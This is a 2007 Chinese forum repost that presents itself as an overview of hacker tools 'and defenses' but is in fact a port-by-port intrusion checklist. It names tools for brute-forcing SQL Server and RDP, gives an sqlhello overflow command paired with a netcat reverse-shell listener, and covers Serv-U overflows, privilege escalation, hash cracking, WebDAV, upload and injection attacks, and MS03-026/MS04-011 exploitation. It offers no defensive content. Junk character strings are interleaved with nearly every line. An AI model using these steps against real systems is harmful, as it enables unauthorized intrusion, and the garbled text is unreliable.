|
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。 ^* t' S4 c+ W0 n9 ^$ O) F/ {
0 m8 c/ X0 d( H. G: f( b9 M8 a0 w. Y& r
1. 1433端口入侵
+ E! f$ z) P& G* X, m2 m
0 G3 A7 R) g$ N0 e1 I scanport.exe 查有1433的机器
! E2 H% w$ @2 Z* X$ R8 y3 s" }3 ^7 A9 S: j7 T# g) p
SQLScanPass.exe 进行字典暴破(字典是关键)
/ _. N5 y2 e0 t0 T6 {' n$ m G# N/ f
最后 SQLTools.exe入侵
( {% {% c+ g! o! u y$ C3 r+ ^5 M7 J* D) d1 g
=============================
- j( S9 j ^ b |$ W- @+ Q" E$ a7 I# W
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 $ N6 h: }5 N, Y# f7 I. G P- m
t0 U8 o$ H) m( ]
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
# Q" h/ q& @. D
' d( r, D; `& {& _; l# w, p( R! L (以上反向的,测试成功)
+ h5 F: y9 R# ^; ?, V9 E5 h) P- S B2 M0 j M0 [$ X
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
1 H! o" o) d" B$ p1 t; H# B' G
4 s& z8 g1 s4 X) c) y4 q/ | 2. 4899端口入侵
: A/ q4 ^2 t& [6 @2 [) ~- h5 o3 B5 ~ K% n% e
用4899过滤器.exe,扫描空口令的机器
' I. l! q- L! E
) q* g/ {% [ d& D7 b) d: R$ C' n 3. 3899的入侵
+ y0 k% [7 @2 D6 u
+ N1 F' D( |: V; X( g 对很早的机器,可以试试3389的溢出(win3389ex.exe)
9 L& ~9 H6 ]* q- t% a/ [2 x4 a- p8 E5 b% i6 H! m( A. Y
对2000的机器,可以试试字典暴破。(tscrack.exe) - ~* f5 t( s+ y n% k) v
4 F; x) T4 A( b: M8 k9 x
4. 80入侵 & K) o; l6 ?1 r5 v
' @3 i- V J) u! y6 e 对sp3以前的机器,可以用webdav入侵; $ u8 x4 N0 R1 Q3 ?
+ g$ _! z) c" c
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) - [2 F# k% H' R$ v; W
" D5 S* A2 ~" w# a% X& i
可以利用SQL进行注入。(小榕的注入软件)。
8 d# |& j5 B8 C- j
% b; m$ ~+ Y4 P; s' G# U 5. serv-u入侵(21端口)
% ]& d: W" Y! _ _8 W# C! [2 C: P6 d; S4 @* B+ `
对5. 004及以下系统,可用溢出入侵。(serv5004.exe) % ` s% X$ ?9 A( r/ p; a/ ]) ~
- C n" |" M+ x, c4 T
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
4 u% |8 w! W4 T8 b. B+ Q6 @) Q" o# t
======================================
0 z. i' N' u4 `7 o8 T! h# Y8 e8 J7 P6 U3 F
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
- U3 k0 h5 n7 `9 I& b3 u! g7 ^1 C0 {) Z$ U/ K0 D z* E
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 7 I% y) d$ y0 Z1 p1 a% {
4 D3 S! m. F" j8 V' U+ Z
6. 554端口 . K8 p% Z4 b( b( u" o; O
) J4 _; X4 M% k* H
用real554.exe入侵。 ; [: c7 h$ D0 {& |
' b2 T% M7 K! G1 u% F. m
7. 6129端口
! S* Q0 C, t# G$ H) `9 a, |+ F( f- F6 b5 x1 t8 e
用DameWare6129.exe入侵。
( v) F1 m; \5 `; _/ ?% G
4 M4 T2 ?% P. x. M 8. 系统漏洞
- R: w. o. S) i& R4 _& n0 W% ]4 K& ?. b; F, E/ ]7 p+ W) H1 l! W0 q5 _
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
. u$ d- q# Z% ]
- V; k% d) |3 W, n5 v& [# G2 U- C+ ^6 d 进行溢出入侵。 " H! Y/ e! o8 I9 s; M6 b7 \
% R2 s$ l' O, }: k$ Y
9. 3127等端口 0 j, B, v6 U5 Z' X
. y/ W+ U& F0 h) U. T4 ^ 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
) w' U$ U. r+ e, L! l8 Z* i! j) H6 @1 `
10. 其他入侵
2 `$ a% B- T# J9 k* w( I: x4 z* N- Q: Y+ y
! P8 \6 Y& @& H5 e! c& M) o9 [ 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
; b& \# U( K, y% i/ u7 i6 o
0 F$ _9 A% Y7 H2 B2 @| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
